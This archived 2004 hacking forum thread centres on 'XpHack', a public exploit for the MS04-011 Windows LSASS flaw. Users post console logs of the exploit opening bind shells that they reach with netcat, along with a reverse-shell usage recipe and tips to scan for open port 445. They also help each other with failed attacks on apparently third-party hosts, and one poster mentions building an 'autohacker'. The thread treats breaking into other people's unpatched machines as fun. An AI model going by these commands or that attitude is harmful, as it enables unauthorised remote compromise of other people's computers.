found this on security focus, havent seen this particular brew of this ms04011 talken about here yet. the guy that modded it up seemed to do a good job of automating the process more
http://downloads.securityfocus.com/vulnera...ploits/xphack.c
Full Version: Xphack.c
I"m trying it right now, I will review that 
EDIT : Well, imo it works as good as the HOD- lsass.exe exploit, but it binds the shell locally without a reverse. Well that's nice to have it in the both version, thanks for sharing !
// Compiled exploit
EDIT : Well, imo it works as good as the HOD- lsass.exe exploit, but it binds the shell locally without a reverse. Well that's nice to have it in the both version, thanks for sharing !
// Compiled exploit
| QUOTE (LKM @ May 8 2004, 08:40 AM) |
| I"m trying it right now, I will review that EDIT : Well, imo it works as good as the HOD- lsass.exe exploit, but it binds the shell locally without a reverse. Well that's nice to have it in the both version, thanks for sharing ! |
heh, sounds nice
Nice Nice Love this Bug 
Thanks to Microsoft and Coders of this Nice xploit ! *g*
I gonna have fun with this...
tWiStEr
Thanks to Microsoft and Coders of this Nice xploit ! *g*
I gonna have fun with this...
tWiStEr
works good:
| CODE |
C:\WINDOWS>d:\hax\xp 10.10.10.61 333 -----XpHack 1.0 beta----- -----ExPlOiT CoDeD By: JoCaNoR----- Connecting...Good Getting a shell...OoOoOps shell!! C:\WINDOWS>nc 10.10.10.61 333 Microsoft Windows XP [Wersja 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> |
Hi,
i used it so much...but here can you see what my result is can you help me what this means ??
i used it so much...but here can you see what my result is can you help me what this means ??
| CODE |
C:\WINDOWS\Desktop\expl0its>xp ***.***.***.*** 555 -----XpHack 1.0 beta----- -----ExPlOiT CoDeD By: JoCaNoR----- Connecting...Good Getting a shell...OoOoOps shell!! C:\WINDOWS\Desktop\expl0its>nc ***.***.***.*** 555 C:\WINDOWS\Desktop\expl0its> |
i got no shell he says it but netcat doesnt make it ??? do you know why?
I think the exploit failed and the port wasn't opened. Try nc -vv ***.***.***.*** 666. Then you get some verbose information.
Hi thanks for you answere...
Hmm the ips i scanned had all the port open....
Are there several Ports or just this one port to xploit the machines?
Hmm the ips i scanned had all the port open....
Are there several Ports or just this one port to xploit the machines?
well the source code looks good it isnt hard to put in a connect back
but it uses the same vuln as the lsass exploit from me or HOD
anyway its a good exploit
greetz agathos
but it uses the same vuln as the lsass exploit from me or HOD
anyway its a good exploit
greetz agathos
isn't it something like this ?
first start nc -vv -L -p <PORT>
then execute xp localhost <PORT>
?
first start nc -vv -L -p <PORT>
then execute xp localhost <PORT>
?
no its bindshell
you do xphack ip bindport
then
nc ip port
you do xphack ip bindport
then
nc ip port
What means that:
| CODE |
-----XpHack 1.0 beta----- -----ExPlOiT CoDeD By: JoCaNoR----- Connecting... Error, cna't connect to victim machine |
I get always this Message... do I somethink wrong?
the target port 445 is blocked by fw or router.
Thanks Guys But It's Detected!
so which ports can I try? 666, 555, 333? all of 'em?
yup search for servers that have those three ports wide open.....good luck m8!!
*oink*
*oink*
| QUOTE (HotN0b0dy @ May 8 2004, 07:05 PM) |
| so which ports can I try? 666, 555, 333? all of 'em? |
Yeah yu can use every port for bindshell....
Just the scan port is 445!
That's it!
(Sorry for my english -> I am from Germany ^^)
why this exploit works 1 time on 20? is it due to the security fix?
yeah dude tks for the source
THX a lot!This helped me to understand why sometimes it's possible to reconnect to a target and sometimes it's not.
Good Exploit ! THX a lot!
I try to exploit xp host (unpatch) is always success.
I dont know about you, this code upsets me and points out why you should NEVER share any source code.
This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.
This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from.
| QUOTE (DaClueless @ May 9 2004, 01:29 AM) |
| I dont know about you, this code upsets me and points out why you should NEVER share any source code. This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from. |
jesus christ, everything is a copy of something else to a degree. just leave it alone, you and your capitalist thinking. nice find tho!!
Thanks for sharing
After i got remote shell on victim machine, how do i transfer and execute via nc?
i know how to do it if both victim and me have nc but this exploit did not upload nc to the victim.
Any help would be appreciated.
i know how to do it if both victim and me have nc but this exploit did not upload nc to the victim.
Any help would be appreciated.
| QUOTE (Rtyp3 @ May 9 2004, 01:37 AM) |
| jesus christ, everything is a copy of something else to a degree. just leave it alone, you and your capitalist thinking. nice find tho!! |
I can see you have never spent hour and hours on something, that someone took and called their own.
For me, what I see is this. The original author gave us thier time and hard work in making the source code for the exploit. I feel, we owe it to them to give them credit if you use most of thier code.
What the hell? Is not password?!?!!? The end of the stupid fad?
heh, nice work mate!
heh, nice work mate!
| QUOTE (DaClueless @ May 9 2004, 01:29 AM) |
| I dont know about you, this code upsets me and points out why you should NEVER share any source code. This is mostly stolen code from other exploit with the authur not giving any credit to whom he stole the code from. |
what about shellcode? look at how many reverse shell and shell binding code are the same. should they and the basic concept behind how they work be kept locked away for nobody to see? lets lock up the linux kernel while were at it also, too many smart people that understand code are finding weak buffers in it...
i can generally see where your coming from, but your just wrong. every exploit that come out are all based on exploting one weakness, each it's own. but for every advisory, look how many exploits are released for each. it's because code can be improvised to crack something each the way the author intends.
</rant>
but yeah, author should of at least acknowledged the other releases.
oh yeah, and on the whole 'passwording files' topic... i wanted to post an actual topic about this in the forum, but i dont feel like it.
people, if your going to post information on the internet, dont make people have to msg you and kiss your ass for a password.
it's not going to keep it private. i'm going to devote a website to me unrarring people's passworded "private" programs they made, and posted onto a website accessible to any idiot w/ an email address.
and a high majority of these programs they are posting are a bunch of ocx's and dll's... all glued together to some low-level programming code and compiled on some kids unregistered copy visual basic they downloaded off kazaa.
</rant>
however i must say, there are people that post unique and creative custom code that is actually of use in this world. to those people that release here, this bud's for you.
people, if your going to post information on the internet, dont make people have to msg you and kiss your ass for a password.
it's not going to keep it private. i'm going to devote a website to me unrarring people's passworded "private" programs they made, and posted onto a website accessible to any idiot w/ an email address.
and a high majority of these programs they are posting are a bunch of ocx's and dll's... all glued together to some low-level programming code and compiled on some kids unregistered copy visual basic they downloaded off kazaa.
</rant>
however i must say, there are people that post unique and creative custom code that is actually of use in this world. to those people that release here, this bud's for you.
yeah...this is nice source indeed, but i cant get any shells. are all ppl patched or am i doing something wrong?
Thanks for sharing!!
Very nice sploit ;-)
Very nice sploit ;-)
This exploit use the same bind shellcode that the HouseOfDaBus version 
...so if you want a connect back shell use the houseofdabus version, it's the same...
...so if you want a connect back shell use the houseofdabus version, it's the same...
hmm..i'd really need some help here.
can anyone tell me why i cant connect to remote PC?
C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666
-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----
Connecting...Good
Getting a shell...OoOoOps shell!!
C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666
[***.**.**.***] 666 (doom): TIMEDOUT
sent 0, rcvd 0: NOTSOCK
C:\FTP Files\Programje\XPhack>
did i miss anything? wrong port? wrong command?
thx
can anyone tell me why i cant connect to remote PC?
C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666
-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----
Connecting...Good
Getting a shell...OoOoOps shell!!
C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666
[***.**.**.***] 666 (doom): TIMEDOUT
sent 0, rcvd 0: NOTSOCK
C:\FTP Files\Programje\XPhack>
did i miss anything? wrong port? wrong command?
thx
| QUOTE (DaClueless @ May 9 2004, 04:46 AM) |
| I can see you have never spent hour and hours on something, that someone took and called their own. For me, what I see is this. The original author gave us thier time and hard work in making the source code for the exploit. I feel, we owe it to them to give them credit if you use most of thier code. |
If you would have read the first post on this thread, you would have seen this:
"found this on security focus, havent seen this particular brew of this ms04011 talken about here yet. the guy that modded it up seemed to do a good job of automating the process more"
The keyword here is Modded, he took no credit for the original work, as for credit, just look at the source and you can see where it came from. The open source world is built on people modding other peoples work, so get used to it! This is how people learn
Very good tool BIG ThX 4 it
| QUOTE (tonikgin @ May 9 2004, 11:20 AM) |
| oh yeah, and on the whole 'passwording files' topic... i wanted to post an actual topic about this in the forum, but i dont feel like it. people, if your going to post information on the internet, dont make people have to msg you and kiss your ass for a password. it's not going to keep it private. i'm going to devote a website to me unrarring people's passworded "private" programs they made, and posted onto a website accessible to any idiot w/ an email address. and a high majority of these programs they are posting are a bunch of ocx's and dll's... all glued together to some low-level programming code and compiled on some kids unregistered copy visual basic they downloaded off kazaa. </rant> however i must say, there are people that post unique and creative custom code that is actually of use in this world. to those people that release here, this bud's for you. |
Very well said.
| QUOTE (HotN0b0dy @ May 9 2004, 04:14 PM) |
| hmm..i'd really need some help here. can anyone tell me why i cant connect to remote PC? C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666 -----XpHack 1.0 beta----- -----ExPlOiT CoDeD By: JoCaNoR----- Connecting...Good Getting a shell...OoOoOps shell!! C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666 [***.**.**.***] 666 (doom): TIMEDOUT sent 0, rcvd 0: NOTSOCK C:\FTP Files\Programje\XPhack> did i miss anything? wrong port? wrong command? thx |
i guess not.. i've tested it like that and it worked fine...
1st command: xp 10.0.0.0 666
Connecting...Good
Getting a shell...OoOoOps shell!!
2nd command: nc 10.0.0.0 666
C:\windows\system32\
simple as that =)
try some other vulnerable boxes
| QUOTE (cross @ May 9 2004, 04:47 PM) |
| The keyword here is Modded, he took no credit for the original work, as for credit, just look at the source and you can see where it came from. The open source world is built on people modding other peoples work, so get used to it! This is how people learn |
Yes, the open source world is built on modding other people work so we can all learn from it. But it is not built on the fact people not giving any credit to the orig author. I feel it very simple to give one line, that says code base on so-and-so code. I am, also so shock how many people feel that, there nothing wrong about using someone work, without given then any credit.
GNU license agreement
/* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
http://www.gnu.org/licenses/licenses.html
| QUOTE (HotN0b0dy @ May 9 2004, 04:14 PM) |
| hmm..i'd really need some help here. can anyone tell me why i cant connect to remote PC? C:\FTP Files\Programje\XPhack>xp ***.**.**.*** 666 -----XpHack 1.0 beta----- -----ExPlOiT CoDeD By: JoCaNoR----- Connecting...Good Getting a shell...OoOoOps shell!! C:\FTP Files\Programje\XPhack>nc -vv ***.**.**.*** 666 [***.**.**.***] 666 (doom): TIMEDOUT sent 0, rcvd 0: NOTSOCK C:\FTP Files\Programje\XPhack> did i miss anything? wrong port? wrong command? thx |
take your -vv out of your nc line
| QUOTE (mRtWiStEr @ May 8 2004, 10:46 AM) | ||
| Hi, i used it so much...but here can you see what my result is can you help me what this means ??
i got no shell he says it but netcat doesnt make it ??? do you know why? |
lol! i think it was better u play cards or playmobile!
sorry but those questions are stupid! sorry iam not 100 % but some questions or answer are funny!
is it possible that my nc isnt workin? cuz i dont get any shells 
I have the same Prob like HotNoob 
| QUOTE (HotN0b0dy @ May 10 2004, 07:34 AM) |
| is it possible that my nc isnt workin? cuz i dont get any shells |
I don't think the problem is your netcat. It should be the way you're perfoming the comands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers.
Very handy for making an autohacker
| QUOTE (bdark @ May 10 2004, 05:06 PM) | ||
I don't think the problem is your netcat. It should be the way you're perfoming the comands (read all the posts on this topic), or maybe you're trying ranges without vulnerable servers. |
it's same if i dont type -vv. -vv just tells me where's the error, if it is. And i scanned IPs before i started exploiting 'em.
Are PCs maybe patched?
This exploit is easy to use
first cmd.exe : nc.exe -l -p 66
second cmd.exe : xp.exe 0 vic ip 66 your ip
..
..
and you'll get shell on the first cmd.exe
If it isn't working, vic is patched, filtering 445 .
Try also several time, somtimes it doesn't work, I don't know why.
first cmd.exe : nc.exe -l -p 66
second cmd.exe : xp.exe 0 vic ip 66 your ip
..
..
and you'll get shell on the first cmd.exe
If it isn't working, vic is patched, filtering 445 .
Try also several time, somtimes it doesn't work, I don't know why.
Please someone tell me what Bug it uses ?
^^^^^ ?
It's people like this that keep this board from it's true potential.
ms04011
It's people like this that keep this board from it's true potential.
ms04011
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
